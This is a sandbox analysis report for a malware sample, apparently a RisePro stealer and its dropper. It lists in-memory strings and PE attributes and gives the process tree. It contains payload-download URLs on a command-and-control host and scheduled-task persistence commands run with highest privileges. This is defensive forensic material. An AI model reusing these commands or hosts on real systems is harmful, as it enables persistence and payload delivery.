Source: WwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/O
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/d
Source: WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarppData
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar1
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar5
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rars
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.4.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT%
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTv
Source: SciTE.exe.4.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.4.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.4.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_f59074ed-0

System Summary

PE file contains section with special chars

Source: hunta[1].exe	Static PE information: section name:
Source: hunta[1].exe	Static PE information: section name: .idata
Source: hunta[1].exe	Static PE information: section name:
Source: RageMP131.exe.2.dr	Static PE information: section name:
Source: RageMP131.exe.2.dr	Static PE information: section name: .idata
Source: RageMP131.exe.2.dr	Static PE information: section name:
Source: MPGPH131.exe.2.dr	Static PE information: section name:
Source: MPGPH131.exe.2.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr	Static PE information: section name:
Source: MyProg.exe.4.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: WwKLWFk.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\hunta[1].exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F04870	2_2_00F04870
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E82040	2_2_00E82040
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F0B800	2_2_00F0B800
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E9A100	2_2_00E9A100
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E822C0	2_2_00E822C0
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E942A0	2_2_00E942A0
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F603A0	2_2_00F603A0
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00EF0380	2_2_00EF0380
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E8AB50	2_2_00E8AB50
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F63B28	2_2_00F63B28
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F5A450	2_2_00F5A450
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F01590	2_2_00F01590
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00F6956F	2_2_00F6956F
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E8A720	2_2_00E8A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00216076	4_2_00216076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00216D00	4_2_00216D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_0038B800	14_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_00384870	14_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_00302040	14_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_0031A100	14_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003142A0	14_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003022C0	14_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003E3B28	14_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_0030AB50	14_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003E03A0	14_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_00370380	14_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003DA450	14_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_003E956F	14_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_00381590	14_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_0030A720	14_2_0030A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_0038B800	15_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_00384870	15_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_00302040	15_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_0031A100	15_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003142A0	15_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003022C0	15_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003E3B28	15_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_0030AB50	15_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003E03A0	15_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_00370380	15_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003DA450	15_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_003E956F	15_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_00381590	15_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_0030A720	15_2_0030A720
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002FB800	21_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002F4870	21_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_00272040	21_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0028A100	21_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002842A0	21_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002722C0	21_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_00353B28	21_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0027AB50	21_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_003503A0	21_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002E0380	21_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0034A450	21_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0035956F	21_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_002F1590	21_2_002F1590
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_0027A720	21_2_0027A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B56076	22_2_00B56076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B56D00	22_2_00B56D00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002FB800	24_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002F4870	24_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_00272040	24_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0028A100	24_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002842A0	24_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002722C0	24_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_00353B28	24_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0027AB50	24_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_003503A0	24_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002E0380	24_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0034A450	24_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0035956F	24_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_002F1590	24_2_002F1590
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_0027A720	24_2_0027A720

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: String function: 003DD590 appears 46 times
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: String function: 0034D590 appears 46 times

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640

Source: MyProg.exe.4.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: hunta[1].exe, 00000002.00000003.1321581799.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000003.1322295794.0000000005BC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3743392087.0000000005710000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe	Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe

Source: hunta[1].exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: WwKLWFk.exe.2.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: WwKLWFk.exe.2.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: WwKLWFk.exe.2.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: hunta[1].exe	Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: RageMP131.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: MPGPH131.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9998547544838146

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@28/31@1/2

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_0021119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		4_2_0021119F
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		22_2_00B5119F

Source: C:\Users\user\Desktop\hunta[1].exe

File created: C:\Users\user\AppData\Local\RageMP131

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456

Source: C:\Users\user\Desktop\hunta[1].exe

File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hunta[1].exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Source: hunta[1].exe

ReversingLabs: Detection: 94%

Source: hunta[1].exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\hunta[1].exe

File read: C:\Users\user\Desktop\hunta[1].exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hunta[1].exe "C:\Users\user\Desktop\hunta[1].exe"
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Jump to behavior
